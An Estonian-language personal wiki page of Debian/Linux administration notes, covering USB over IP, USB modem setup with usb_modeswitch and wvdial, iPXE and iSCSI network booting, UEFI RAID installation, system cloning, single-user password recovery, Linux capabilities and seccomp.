Function Rate (MB/s) Avg time Min time Max time
Triad: 4784.1065 0.0582 0.0577 0.0589

Mälu jõudlust on eriti mõtet hinnata selleks, et võrrelda olemasolevat süsteemi uuega, millega olemasolev kavatsetakse asendada.

===Ressursikasutuse haldamine===

* IO

# ionice -c 3 -p 1919

* CPU

# renice ...

===Protsesside haldamine===

Kasutaja postgres protsesside nimekirja nimekirja esitamine

# ps -a -f -u postgres

Kasutaja postgres protsesside ja vastavate lõimede nimekirja esitamine

# ps -aLf -u postgres

====Protsesside grupp====

TODO

<pre>
# ps -efj | less
</pre>

===pdftk kasutamine===

pdftk http://www.pdflabs.com/docs/install-pdftk/ paigaldamiseks sobib öelda

# apt-get install pdftk

===tvtime kasutamine===

# apt-get install tvtime

ning näidata

Please choose the TV standard to use -> PAL
Please choose the frequency table to use -> Custom (must run tvtime-scanner first)
Please choose the video4linux device which corresponds to your capture card -> /dev/video0
Please choose the device that will be used in NTSC areas for decoding closed captions and XDS channel information; Device to use for VBI decoding -> /dev/vbi0
Please choose whether tvtime should be "setuid root", therefore getting root privileges when running -> No

Esmalt tuleb laadida TV kaardile vastav draiver, nt selliselt

# rmmod saa7134
# modprobe saa7134 card=21 tuner=26

kus

* card sobiv valik tagab pildi
* tuner sobiv valik tagab heli

Seejärel skaneerida kanalid

$ tvtime-scanner
Reading configuration from /etc/tvtime/tvtime.xml
Scanning using TV standard PAL.
Scanning from 44.00 MHz to 958.00 MHz.
Found a channel at 607.00 MHz (605.50 - 608.25 MHz), adding to channel list.
I/O warning : failed to load external entity "/home/imre/.tvtime/stationlist.xml"
station: No station file found, creating a new one.

ning käivitada tvtime programm

# tvtime

Kasulikud lisamaterjalid

* https://sites.google.com/site/jobinau2/saa7130basedtvtunercardunderlinux

===PAM===

TODO

====Kasutaja autentimine pam_unix abil====

/etc/shadow failis on üldiselt toetatud sellised räsid

* $1$ - MD5
* $2a$ - blowfish
* $5$ - SHA-256
* $6$ - SHA-512

Kui osutab, et /etc/shadow ei tööta, st nt peale süsteemi uuendamist kasutaja sisestab õige parooli kuid ei saa sisse logida, siis tõenäoliselt ei sobi kokku /etc/pam.d/* seadistusfailid /etc/shadow sisuga.

Kasulikud lisamaterjalid

* http://digitalconsumption.com/forum/615-Blowfish-shadow-files-on-Debian

===Gnome-shell===

Gnome shell http://en.wikipedia.org/wiki/GNOME_Shell on ... ja kasutamine eeldab

* 3D toega videokaardi olemasolu, kusjuures kaart peab nö sobima (nt Radeon HD 3600 fglrx draiveriga annab vigu nö olulises kohas, GeForce 7600 GS nouveau draiveriga sobib)

Olulised asjad

* extensions
* gnome-tweak-tool

===USB over IP===

USB over IP tarkvara http://usbip.sourceforge.net/ abil saab teha ühe arvuti füüsilised USB seadme üle võrgu kasutatavaks teisest avutist.

Praktiliselt voib olla hada sellest, et user space ja kernel space tarkvara ei sobi kokku. Nt tundub, et Ubuntu (sh v. 14.04) paketihalduses on usbip v. 0.7, aga tuumas talle vajalikke mooduleid pole. Teine variant on, et kasutada saab usbip v. 1.1, millega tuuma moodulid naikse paremini kokku sobivat. Debian Jessie sisaldab 2014 aasta suvel v. 1.1 tarvkara ja see paistab töötavat.

====Tööpõhimõte====

TODO

====Tarkvara paigaldamine====

Tarkvara paigladamiseks sobib mõlemas arvuti öelda

# apt-get install usbip

Paigaldamise tulemusena tekib failisysteemi muu hulgas

* usbip - utiliit serveri seadistamiseks ja kliendi juhtimiseks
* usbipd - serveri poolel tootav deemon

====Serveri poole ettevalmistamine ja käivitamine====

Laadida moodulid

server:~# modprobe usbip_core
server:~# modprobe usbip_host

Käivitada usbipd deemon, kuulab vaikimisi 3240/tcp pordil

server:~# usbipd

USB seadmete serveris olevate USB seadmete nimekirja esitamiseks sobib öelda

server:~# usbip list --local
Local USB devices
=================
- busid 1-1 (8087:0024)
Intel Corp. : Integrated Rate Matching Hub (8087:0024)
1-1:1.0 -> hub

- busid 1-1.2 (0781:5530)
SanDisk Corp. : Cruzer (0781:5530)
1-1.2:1.0 -> usb-storage

- busid 1-1.4 (0424:2514)
Standard Microsystems Corp. : USB 2.0 Hub (0424:2514)
1-1.4:1.0 -> hub

- busid 1-1.4.3 (046d:c31d)
Logitech, Inc. : Media Keyboard K200 (046d:c31d)
1-1.4.3:1.0 -> usbhid
1-1.4.3:1.1 -> usbhid

- busid 1-1.4.4 (046d:c05a)
Logitech, Inc. : M90/M100 Optical Mouse (046d:c05a)
1-1.4.4:1.0 -> usbhid

- busid 1-1.5 (04e6:e001)
SCM Microsystems, Inc. : SCR331 SmartCard Reader (04e6:e001)
1-1.5:1.0 -> usbfs

Seadme eksportimiseks sobib oelda, nt Cruizer USB pulk jaoks

server:~# usbip bind -b 1-1.2
bind device on busid 1-1.2: complete

Tulemusena on --list väljundis vastav seade

- busid 1-1.2 (0781:5530)
SanDisk Corp. : Cruzer (0781:5530)
1-1.2:1.0 -> usbip-host

====Kliendi poole ettevalmistamine ja käivitamine====

Laadida moodul

klient:~# modprobe vhci_hcd

Eksporditud seadmete nimekirja küsimiseks sobib öelda kliendi arvutis

klient:~# usbip list -r 192.168.10.10
Exportable USB devices
======================
- 192.168.10.10
1-1.2: SanDisk Corp. : Cruzer (0781:5530)
: /sys/devices/pci0000:00/0000:00:07.0/usb1/1-1/1-1.2
: (Defined at Interface level) (00/00/00)
: 0 - Mass Storage / SCSI / Bulk-Only (08/06/50)

Seadme kasutamiseks

klient:~# usbip attach -r 192.168.10.10 -b 1-1.2

Seejärel on seade paistab nagu kohalik seade ja on valmis kasutamiseks, nt

klient:~# lsusb
Bus 009 Device 004: ID 0781:5530 SanDisk Corp. Cruzer
..

ja usbip spetsiifilisemalt

klient:~# usbip port
Imported USB devices
====================
Port 00: <Port in Use> at High Speed(480Mbps)
unknown vendor : unknown product (0781:5530)
9-1 -> usbip://192.168.10.10:3240/1-1.2
-> remote bus/dev 001/037

Kasutamise lõpetamiseks sobib öelda kasutades vhci_hcd pordi numbrit

klient:~# usbip detach --port=0

====Serveri poolel kasutamise lõpetamine====

Peale seda kui kliendi pool on seadme kasutamine lõpetatud, öelda

server:~# usbip unbind -b 1-1.2
unbind device on busid 1-1.2: complete

====Kasulikud lisamaterjalid====

* http://www.howtoforge.com/how-to-set-up-a-usb-over-ip-server-and-client-with-debian-lenny
* https://www.kernel.org/doc/readme/drivers-staging-usbip-userspace-README

===Töötamine failisüsteemiga===

Tavaliselt on häda miinus märgiga failidega töötamisel, -- võtme kasutamine aitab, nt '-failinimi' nimelise faili kustutamisel

$ rm -- -failinimi

===USB netipulga kasutamine===

USB netipulga kasutamine koosneb kahest osast

* arvutis peavad olema /dev/ttyUSB* nimelised usb serial seadmed
* ppp ühenduse loomiseks tuleb kasutada sobivat programmi, wvdial, Gnome desktopilt midagi vms

====Tööpõhimõte====

Kui netipulk ei tööta automaatselt, siis võib olla probleem selles, et süsteem tunneb ta ära storage seadmena ja mitte võrguseadmena

<pre>
[11360165.312014] usb 1-4: new high-speed USB device number 10 using ehci-pci
[11360165.458578] usb 1-4: New USB device found, idVendor=12d1, idProduct=1505
[11360165.458734] usb 1-4: New USB device strings: Mfr=3, Product=2, SerialNumber=0
[11360165.458900] usb 1-4: Product: HUAWEI Mobile
[11360165.459001] usb 1-4: Manufacturer: Huawei Technologies
[11360165.460790] usb-storage 1-4:1.0: USB Mass Storage device detected
[11360165.461082] scsi10 : usb-storage 1-4:1.0
[11360166.461381] scsi 10:0:0:0: CD-ROM HUAWEI Mass Storage 2.31 PQ: 0 ANSI: 0
[11360166.478285] sr1: scsi-1 drive
[11360166.478582] sr 10:0:0:0: Attached scsi CD-ROM sr1
[11360166.478694] sr 10:0:0:0: Attached scsi generic sg5 type 5
</pre>

usb-modeswitch paketi tarkvara teeb temast võrguseadme.

====/dev/ttyUSB* seadmete tekitamine====

E392 kirjaga netipulk paistab faili usb.ids tõttu

# grep 1505 /var/lib/usbutils/usb.ids
1505 E398 LTE/UMTS/GSM Modem/Networkcard

lsusb väljundis E398

Bus 001 Device 041: ID 12d1:1505 Huawei Technologies Co., Ltd. E398 LTE/UMTS/GSM Modem/Networkcard

Kusjuures /dev kataloogis pole usb serialile vastavaid faili, st /dev/ttyUSB* nimelisi.

Kasutamiseks sobib tekitada fail

# cat /etc/usb_modeswitch.d/12d1\:1505
# Huawei E392

DefaultVendor= 0x12d1
DefaultProduct= 0x1505

TargetVendor= 0x12d1
TargetProductList=0x1506

MessageContent="55534243123456780000000000000011062000000100000000000000000000"

ning lisada faili /lib/udev/rules.d/40-usb_modeswitch.rules lõpupoole rida

# Huawei E392
ATTRS{idVendor}=="12d1", ATTRS{idProduct}=="1505", RUN+="usb_modeswitch '%b/%k'"

Seejärel võtta pulk usb pesast välja ja uuesti sisse panna, lsusb väljundis peaks nüüd olema, 1506 -> 1505 muutunud

Bus 001 Device 043: ID 12d1:1506 Huawei Technologies Co., Ltd. E398 LTE/UMTS/GSM Modem/Networkcard

ning lisaks tekkinud seadmed

# ls -ld /dev/ttyUSB*
crw-rw---- 1 root dialout 188, 0 Dec 20 01:27 /dev/ttyUSB0
crw-rw---- 1 root dialout 188, 1 Dec 20 01:16 /dev/ttyUSB1
crw-rw---- 1 root dialout 188, 2 Dec 20 01:16 /dev/ttyUSB2

Tundub, et kui systemd millegipärast ei taha käivitada sobib öelda

# /usr/sbin/usb_modeswitch --default-vendor 0x12d1 --default-product 0x1505 -J

====wvdial kasutamine====

# cat /etc/wvdial.conf
[Dialer Defaults]
Phone =
Username =
Password =
New PPPD = yes

Modem Type = Analog Modem
Phone = *99#
ISDN = 0
Baud = 460800
Username = " "
Password = " "
Modem = /dev/ttyUSB0
Init1 = ATZ
Init2 = at+cgdcont=1,"ip","internet.emt.ee"
Stupid Mode = 1

kus

* TODO

käivitamiseks sobib öelda

# wvdial
--> WvDial: Internet dialer version 1.61
--> Initializing modem.
--> Sending: ATZ
ATZ
OK
--> Sending: at+cgdcont=1,"ip","internet.emt.ee"
at+cgdcont=1,"ip","internet.emt.ee"
OK
--> Modem initialized.
--> Sending: ATDT*99#
--> Waiting for carrier.
ATDT*99#
CONNECT
--> Carrier detected. Starting PPP immediately.
--> Starting pppd at Fri Dec 20 01:35:25 2013
--> Pid of pppd: 17139
--> Using interface ppp0
--> local IP address 10.128.53.223
--> remote IP address 10.64.64.64
--> primary DNS address 217.71.33.151
--> secondary DNS address 217.71.33.150

Tulemusena tekib ppp0 seade üle mille saab liiklust ruutida (teiste arvutite liiklust tuleb src nat'tida)

# ifconfig ppp0
ppp0 Link encap:Point-to-Point Protocol
inet addr:10.128.77.124 P-t-P:10.64.64.64 Mask:255.255.255.255
UP POINTOPOINT RUNNING NOARP MULTICAST MTU:1500 Metric:1
RX packets:7 errors:0 dropped:0 overruns:0 frame:0
TX packets:8 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:3
RX bytes:70 (70.0 B) TX bytes:157 (157.0 B)

====Kasulikud lisamaterjalid====

* http://trisquel.info/en/forum/install-huawei-e392-usb-lte-drivers
* http://www.draisberghof.de/usb_modeswitch/bb/viewtopic.php?t=681
* http://blog.bluedrive.ro/?p=28
* http://www.draisberghof.de/usb_modeswitch/
* https://bugs.launchpad.net/ubuntu/+source/network-manager/+bug/889878
* http://importgeek.wordpress.com/tag/12d11505/
* http://www.draisberghof.de/usb_modeswitch/bb/
* http://oliver.tele2.ee/kuidas-huawei-e1752-ja-ubuntu-10-04-kasikaes-internetti-lahevad/
* http://www.draisberghof.de/usb_modeswitch/bb/viewtopic.php?f=4&t=891&p=5898&hilit=12d1%3A1505#p5898

===zip arhivaatori kasutamine===

Parooliga kaitstud arhiivi moodustamiseks sobib öelda nt

$ zip -r --password parool katalooginimi.zip katalooginimi

===Pipe viewer===

Pipe viewer programmiga saab jälgida läbi toru mineva progressi. Paigaldamiseks sobib öelda

# apt-get install pv

Kasutamine paistab välja sedasi

# timeout 10 cat /dev/zero | pv > /dev/null
4GB 0:00:07 [1.91GB/s] [ <=>
..

===AUFS===

AUFS http://aufs.sourceforge.net/ võimaldab mitme kataloogi sisu esitada ühes nö virtuaalses kataloogis. Alternatiivne võimalus on seda saavutada UnionFS abil.

# mount -t aufs -o dirs=/tmp/kata1:/tmp/kata2:/root/kata3 none /tmp/dir

===Network manager===

Lisaks Network manager graafilisele kasutajaliidesele on olemas ka käsurea utiliit nmcli

# nmcli -p dev
================================================
Status of devices
================================================
DEVICE TYPE STATE CONNECTION
------------------------------------------------
docker0 bridge connected docker0
vetha88a ethernet connected vetha88a
br0 openvswitch connected br0
br3 openvswitch connected br3
tep0 openvswitch connected tep0
eth0 ethernet unmanaged --
lo loopback unmanaged --
ovs-system openvswitch unmanaged --

===Skänneri kasutamine===

# apt-get install

Kasulikud lisamaterjalid

* https://help.ubuntu.com/community/ScanningHowTo
* http://www.sane-project.org/sane-backends.html

===Logrotate===

Näitab, mis toimub, aga midagi failisüsteemis vms ei tee

# logrotate -d /etc/logrotate.conf

Teeb nö jõuga

# logrotate -f /etc/logrotate.conf

Roteeritud failide nimedes kuupäeva kasutamiseks sobib logrotate seadistusfailide vastavates sektsioonides kasutada lisaks rida

dateext

Tulemuseks on nt

/var/log/apache2/access.log-20140922.gz

===iPXE===

Käesolevas tekstis mainitud dhcp serveri tarkvarana sobib kasutada paketti

# apt-get install isc-dhcp-server

ja tftpd serverina paketti

# apt-get install atftpd

iPXE tarkvara paketist

# apt-get install ipxe

====Tööpõhimõte====

Kui on kasutada nö tavalise PXE toega võrgukaardiga arvuti, siis üks viis iPXE tarkvara kasutamiseks on laadida see dhcp + tftp serverilt, nt sellise sektsiooniga

host hp.auul {
hardware ethernet 64:31:50:6c:c0:b4;
fixed-address 192.168.10.41;
option broadcast-address 192.168.10.255;
option routers 192.168.10.254;

filename "undionly.kpxe";
next-server 192.168.10.10;
option domain-name-servers 10.192.0.53;
}

kus

* undionly.kpxe - paketist 'apt-get install ipxe'

Tulemusena ilmub vastava arvuti ekraanile iPXE ja Ctrl-B abil saab siseneda iPXE keskkonda. Nt võrgust Debian Jessie installeri käivitamine toimub sedasi

chain http://ftp.imool.ee/pub/incoming/imre/dj-install.ipxe

kus pöördutaval aadressil on tekst sisuga

# cat dj-install.ipxe
#!ipxe
kernel http://ftp.nl.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/linux
initrd http://ftp.nl.debian.org/debian/dists/jessie/main/installer-amd64/current/images/netboot/debian-installer/amd64/initrd.gz
boot

Seejärel käivitab Debian installer. Paistab, et Jessie oskab iSCSI peale paigaldada.

'chain' ütlemist saab automatiseerida nt sellise DHCP serveri sektsiooniga

host hp.auul {
hardware ethernet 64:31:50:6c:c0:b4;
fixed-address 192.168.10.41;
option broadcast-address 192.168.10.255;
option routers 192.168.10.254;

next-server 192.168.10.10;
option domain-name-servers 10.192.0.53;
if exists user-class and option user-class = "iPXE" {
filename "http://ftp.imool.ee/pub/incoming/imre/ipxe";
} else {
filename "undionly.kpxe";
}
}

* esmalt klient arvuti töötab PXE abil DHCP kliendina ja laaditakse undionly.kpxe
* seejärel klient arvuti töötab iPXE abil DHCP kliendina ja pöördutakse http://ftp.imool.ee/pub/incoming/imre/ipxe poole

====Debian v. 8 Jessie kasutamine diskless iSCSI kliendina====

Üks praktiline vajadus iPXE jaoks on iSCSI ressursi kautamine juurfailisüsteemina. Selleks sobib Debian v. 8 Jessie paigaldada eelmises punktis näidatud viisil ja failisüsteemid paigutada iSCSI peale. Paigaldatud arvuti käivitamiseks sobib kasutada sellist iPXE skripti

# cat scsi-boot.ipxe
#!ipxe

dhcp
set initiator-iqn iqn.1993-08.org.debian:01:6f3ac5994d50
sanboot iscsi:10.1.1.15::::iqn.2000-01.com.synology:syno-varundus-1.imretest.989d9f15bf

kus

* TODO

mis laaditakse dchp serveri seadistusfailist reaga

..
filename "http://ftp.imool.ee/pub/incoming/imre/iscsi-boot.ipxe";
...

Kui Debian Jessie peaks bootimisel jääma initramfs prompti, siis võib aidata käsitsi sobivate argumentidega öelda

# iscsistart ...

või pärida iPXE käest

# iscsistart -b

kus

* -t - ...

====Kasulikud lisamaterjalid====

* http://backreference.org/2013/12/23/diskless-iscsi-boot-with-pxe-howto/
* http://www.heath-bar.com/blog/?p=184
* http://etherboot.org/wiki/sanboot/debian_lenny_iscsi
* http://ipxe.org/cmd/sanboot
* http://wiki.openelec.tv/index.php/Network_Boot_-_iSCSI
* http://jpmens.net/2011/07/18/network-booting-machines-over-http/

===D-Bus===

D-Bus http://www.freedesktop.org/wiki/Software/dbus/ ...

D-Bus peal toimuva jälgimiseks sobib kasutada nt d-feet programmi

# apt-get install d-feet

[[Pilt:D-feet-1.gif]]

PlayPause toggleb pausi ja jätkamise vahel, selle rakendamist võib klõpsida hiirega ja öelda Execute või käsurealt

$ dbus-send --print-reply --session --dest=org.mpris.MediaPlayer2.vlc /org/mpris/MediaPlayer2 org.mpris.MediaPlayer2.Player.PlayPause
method return sender=:1.913 -> dest=:1.917 reply_serial=2

Samal ajal ütleb dbus-monitor filtreeridest välja töötavale vlc eksemplarile (:1.913) vastused

$ dbus-monitor "sender=:1.913"
...
method return sender=:1.913 -> dest=:1.978 reply_serial=2
signal sender=:1.913 -> dest=(null destination) serial=88 path=/org/mpris/MediaPlayer2; \
interface=org.freedesktop.DBus.Properties; member=PropertiesChanged
string "org.mpris.MediaPlayer2.Player"
array [
dict entry(
string "PlaybackStatus"
variant string "Paused"
)
]
array [
]

Kasulikud lisamaterjalid

* https://wiki.gnome.org/Apps/DFeet
* http://en.wikipedia.org/wiki/D-Bus

===Debian paigaldamine UEFI arvutisse===

Olgu eesmärk paigadada UEFI firmwarega arvutisse Debian v. 8 Jessie, kusjuures kasutatakse kahe füüsilise kõvakettaga mdadm RAID1 lülitust. System setup keskkonnnas näidata moel või teisel, et arvuti töötab UEFI (mitte BIOS emulatsiooni vms) režiimis. Esimeseks boot valikuks valida UEFI shell. Shellis öelda

> fs0:\BOOT\EFI\BOOT...

Tulemusena käivitub Debian Installer (DI), kus tuleb seadistada selline kõvaketaste kasutus

* /dev/sda1 ja /dev/sdb1 - EFI System Partitionid, 512 MB
* /dev/sda2 ja /dev/sdb2 - mdadm mirror, 2 GB, kus hakkab paiknema /boot failisüsteem
* /dev/sda3 ja /dev/sdb3 - mdadm mirror, 24 GB, kus hakkab paiknema operatsioonisüsteem, LVM köidetel
* /dev/system/swap ja /dev/system/root - asub mdadm peal
* /dev/sda4 ja /dev/sdb4 jne - juurutatakse operatsioonisüsteemi keskkonnas

Tundub, et selliselt ettevalmistatud kõvakettakasutusest saab DI hästi aru ja tulemusena tekib selline süsteem

# df
Filesystem 1K-blocks Used Available Use% Mounted on
/dev/dm-0 11403544 938660 9862568 9% /
udev 10240 0 10240 0% /dev
tmpfs 1631032 8724 1622308 1% /run
tmpfs 4077572 0 4077572 0% /dev/shm
tmpfs 5120 0 5120 0% /run/lock
tmpfs 4077572 0 4077572 0% /sys/fs/cgroup
/dev/md0 1888268 35564 1738736 3% /boot
/dev/sda1 497696 148 497548 1% /boot/efi

Partitsioonid sellised

# parted /dev/sda p
Model: ATA ST2000NM0033-9ZM (scsi)
Disk /dev/sda: 2000GB
Sector size (logical/physical): 512B/512B
Partition Table: gpt
Disk Flags:

Number Start End Size File system Name Flags
1 1049kB 512MB 511MB fat32 efsname boot, esp
2 512MB 2511MB 2000MB sda2part raid
3 2511MB 26.5GB 24.0GB sda3part raid

Lõpuks tuleb kopeerida /dev/sdb1 peale /dev/sda1 failisüsteemi sisu (EFI GRUB bootloader).

# efibootmgr
BootCurrent: 0003
Timeout: 1 seconds
BootOrder: 0003,0009,000D,0000,0001,0002
Boot0000* ATEN Virtual CDROM YS0J
Boot0001* IBA GE Slot 0300 v1404
Boot0002* P0: ST2000NM0033-9ZM175
Boot0003* debian
Boot0009* UEFI: Built-in EFI Shell
Boot000D* UEFI: ATEN Virtual CDROM YS0J

===Arvuti kloonimine===

Arvuti kloonimise tulemusena moodustatakse olemasoleva arvuti tarkvaralisest seistust, st operatsioonisüsteem ja seal töötavad rakendused, töötav koopia. Sõltuvalt asjaoludest, nt kui koopia töötab samas võrgus ja samal ajal lähtepunktiks oleva arvutiga, peab talle seadistama erineva ip aadressi. Kloonimise põhjuseks võib olla nt soov taha arenduspartnerile kättesaadavaks täpselt samasugune seis arvutist nagu on juba kasutada, sel juhul jääb ära vähem või rohkem keerukas arvuti ettevalmistamise aeg, mis kuluks operatsioonisüsteemi ja rakendusprogrammide seaditamisele.

====Kloonimine failisüsteemi kopeerimise teel====

Kloonimiseks on rikkalikult võimalusi, käesolev juhtum kirjeldab kloonimist failisüsteemi kopeerimise teel

* valida välja sobiv klooniks saav arvuti, piisava protsessori, kõvakette, mälu, võrgu jms ressursiga
* käivitada puhas uus klooniks saav arvuti (füüsiline või virtuaalne) systemrescue cd plaadilt
* moodustada fdisk partitsioonid
* tekitada lvm
* tekitada failisüsteemid ja swap

# mkfs.ext4 /dev/sda1
# mkfs.ext4 /dev/system/root
# mkswap -f /dev/system/swap

* ühendada failisüsteemid külge

# mkdir /mnt/root
# mount /dev/system/root
# mkdir /mnt/root/boot
# mount /dev/sda1 /mnt/root/boot

* seadistada võrk
* veenduda, et lähtepunktiks olevas arvutis on klooni riistvara jaoks vajalikud draiverid ja muuud komponendid olemas (LVM, mdadm tugi jms)
* kopeerida rsync abil üle failisüsteem, vajalike eranditega (nt /proc, /sys, /home)

orig# rsync -avHXA --exclude --exclude-deleted --numeric-ids --exclude-from=/root/ex / root@x.x.x.x:/mnt/root/

* tekitada käsitsi excludetud kataloogid

# mkdir proc sys home tmp
# chmod 1777 tmp

* kohendada seadistusfaile

/etc/fstab
/etc/network/interfaces
/etc/udev/rules.d/70-persistent-net.rules

* ühendada külgeühendatud failisüsteemid lahti
* rebootida valikuda 'Boot Linux from hard disk'
* paigaldada bootloader

# install-grub --recheck --no-floppy /dev/sda

* bootida paigaldatud bootloaderi promptist käsitsi

grub> linux /vmlinuz... root=/dev/mapper/system-root ro
grub> initrd /initrd...
grub> boot

* genereerida /boot/grub/grub.conf

# update-grub

====Kopeeritud süsteemi korrastamine====

Kopeeritud süsteemi edasiandmisel võib olla asjakohane pöörata tähelepanu sellistele asjaoludele, st kas ei anta edasi soovimatult palju andmeid

* kasutajate kodukataloogid (.ssh, .pgpass jt)
* root, postgres jt süsteemsete ja muidu alles jäänud kasutajate .bash_history failid

# history -c
# rm .bash_history
...

* cron tööd (/etc/cron.*/*, crontab -l. /var/spool/cron ...)
* /var/backups (passwd.bak, shadow.pak jt)
* varunduse tarkvara agent (nt backupninja)
* monitooringu tarkvara agent (nt zabbix)
* liidestus AD vms keskse kasutajahalduse süsteemiga
* konfiguratsioooni halduse agent (nt puppet)
* logiserverisse logimine
* /tmp, /var/tmp kataloogide sisu
* /var/mail
* /usr/src

===USB data bridge kasutamine===

USB data bridge on kahe otsaga ja keskel asuvad punniga USB kaabel, mille abil saab kaks arvutit omavahel ühendada andmevahetuseks. Üks populaarne kaabel paistab välja sedasi

# lsusb
Bus 001 Device 005: ID 067b:2501 Prolific Technology, Inc. PL2501 USB-USB Bridge (USB 2.0)

Tundub, et Debiani tuumas on mitme sarnase kaabli tugi, aga mitte päris PL2501 oma. Toe tekitamist kirjeldatakse aadressil https://lkml.org/lkml/2012/7/23/106. Muudatuste tegemiseks sobib kasutada tekstis http://www.auul.pri.ee/wiki/Operatsioonis%C3%BCsteemi_Debian_GNU/Linux_paketihalduse_kasutamine#Tuuma_kompileerimine kirjeldatud protseduuri.

Peale mooduli laadimist tekib võrguseade

# ifconfig usb0
usb0 Link encap:Ethernet HWaddr a2:68:73:e5:d6:6e
inet6 addr: fe80::a068:73ff:fee5:d66e/64 Scope:Link
...

Kasulikud lisamaterjalid

* http://paulswasteland.blogspot.com.ee/2014/01/getting-prolific-pl-2501-based-usb-to.html

===Single user ehk ühekasutaja režiim===

Juhtumil, kui arvutisse ei saa root kasutajana sisse logida ja pole ka root parooli teada, et konsoolilt sisse logida, saab kasutada single user režiimi ja seal root parool muuta. Selleks tuleb

* GRUB bootloaderis liikuda nooltega meelepärase boot valiku peale
* vajutada e nagu edit (see on ekraani all kirjas)
* liikuda kernel parameetri juurde ja lisada kõige lõppu juurde tühik ning seejärel

init=/bin/bash

* valida ctrl-x vms (see on ekraani all kirjas) ja arvuti bootida

Tulemusena jõuab arvuti välja nn single user prompti. Selles olekus töötab arvutis suhteliselt vähe protsesse, juurfailisüsteem on monteeritud read-only olekus, võrk on seadistamata jne. root kasutaja või mõni muu kasutaja parooli seadmiseks tuleb

* monteerida juurfailisüsteem read-write olekusse

# mount -o rw,remount /
# passwd kasutajanimi
# sync
# mount -o ro,remount /
# sync
# oodata 30 sekundit
# reboot -f

Seejärel peaks saama seda uut parooli kasutada.

===Ksplice kasutamine===

Kasulikud lisamaterjalid

* https://oss.oracle.com/pipermail/ksplice-debian-8.0-updates/

===Arvuti ressursikasutuse kaardistamine===

Protsessid

# ps auxef

Avatud failid

# lsof -n -p PID
# lsof -n -u USER

Võrgusoketid

# lsof -i TCP
# lsof -i UDP
# lsof -U - unix domain sockets

Semafoorid

# ipcs -u

------ Shared Memory Status --------
segments allocated 2
pages allocated 4309411
pages resident 4136103
pages swapped 169536
Swap performance: 0 attempts 0 successes

------ Semaphore Status --------
used arrays = 64
allocated semaphores = 1083

------ Messages Status --------
allocated queues = 0
used headers = 0
used space = 0 bytes

Nt sellise skript kasutamine cron tööna kord minutis võiks koguda midagi, lisaks sar andmestikule

<pre>
# cat /opt/osres/bin/osres.sh
#!/bin/bash

AEG=`date +%Y%m%d-%H%M%S`;
LOG="/var/log/osres";

if test -f /tmp/osres.lock; then
echo "protsess kaib" >> /tmp/osres.log
# echo "kaivitame crontabist osres" >> /tmp/osres.log
else

touch /tmp/osres.lock
echo "protsess kaivitatakse" >> /tmp/osres.log

timeout 20 ps auxef >> ${LOG}/ps-auxef_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 lsof -n >> ${LOG}/lsof-n_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ipcs -a >> ${LOG}/ipcs-a_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ipcs -u >> ${LOG}/ipcs-u_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 netstat -anp >> ${LOG}/netstat-anp_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 conntrack -L >> ${LOG}/conntrack-L_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 touch /var/lib/postgresql/iocheck/io_${AEG}
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ping -c 4 127.0.0.1 > ${LOG}/ping_127.0.0.1_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ping -c 4 10.0.6.73 > ${LOG}/ping_10.0.6.73_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 ssh root@127.0.0.1 "date > ${LOG}/touch-over-ssh_${AEG}.log"
AEG=`date +%Y%m%d-%H%M%S`;
timeout 20 dig @10.0.9.4 auul.pri.ee soa >> ${LOG}/dig-10.0.9.4-auul.pri.ee-soa_${AEG}.log
AEG=`date +%Y%m%d-%H%M%S`;
export PGPASSWORD="xxx"
timeout 20 psql -h 10.0.6.174 -U monitoring baas -c "select now();" >> ${LOG}/psql-10.0.6.174-monitoring-portaal_${AEG}.log

rm /tmp/osres.lock

fi
</pre>

===Capabilities===

Linuxi tuumas on üldotstarbeline capability süsteem, mille abil nt saab protsessidele anda erinevaid privileege. Nt üks selline capabiliti on dac_override, mis seisneb selles, et root kasutajal on õigus sõita üle enamusest piirangutest, nt saab root töötada kasutajale kuuluvate failidega. Kui root kasutajale ei anna apparmor profiil erilisi privileege, siis root kasutaja on enam-vähem samaväärne tavakasutajaga, mille nimeks on 'root'. St tal ei ole õigust nt teiste kasutajate faile lugeda. Selleks, et root kasutajale kehtestatud apparmor profiili tingimustes see ülesõitmise privileeg tagasi tekiks sobib kasutada profiilis rida 'capability dac_override'. Capability süsteem on üldotstarbeline, ta ei ole LSM komponent, nt üks tema esinemise koht on selles, et uuemal ajal /bin/ping ei ole enam setuid

<pre>
# ls -ld /bin/ping
-rwxr-xr-x 1 root root 44104 Nov 8 2014 /bin/ping

# getcap /bin/ping
/bin/ping = cap_net_raw+ep

# getfattr -d -m "^security\\." /bin/ping
getfattr: Removing leading '/' from absolute path names
# file: bin/ping
security.capability=0sAQAAAgAgAAAAAAAAAAAAAAAAAAA=
</pre>

Kusjuures stat programm kasutab nn legacy syscall'i ja ei esita capabilities kohta infot (olevat olemas ka statx)

Failile cap seadistamiseks sobib öelda nt

# setcap cap_net_raw,cap_setuid,cap_setgid+ep /tmp/capable

kus

* +ep - kehtestatud

Kasulikud lisamaterjalid

* https://wiki.archlinux.org/index.php/Capabilities
* man capabilities

===seccomp===

====Tööpõhimõte====

TODO

====Misc====

<pre>
root@dh-minio-01:~# cat seccomp-list.sh
for pid in $(ls /proc | grep -E '^[0-9]+$'); do
status=$(grep "Seccomp:" /proc/$pid/status 2>/dev/null | awk '{print $2}')
if [ "$status" = "2" ]; then
name=$(cat /proc/$pid/comm)
echo "PID $pid ($name) is SECCOMP FILTERED"
fi
done
</pre>

nt Debian v. 13 arvutis

<pre>
root@dh-minio-01:~# sh seccomp-list.sh
PID 11405 (rsyslogd) is SECCOMP FILTERED
PID 155380 (nginx) is SECCOMP FILTERED
PID 155381 (nginx) is SECCOMP FILTERED
PID 155382 (nginx) is SECCOMP FILTERED
PID 157836 (postgres) is SECCOMP FILTERED
PID 157837 (postgres) is SECCOMP FILTERED
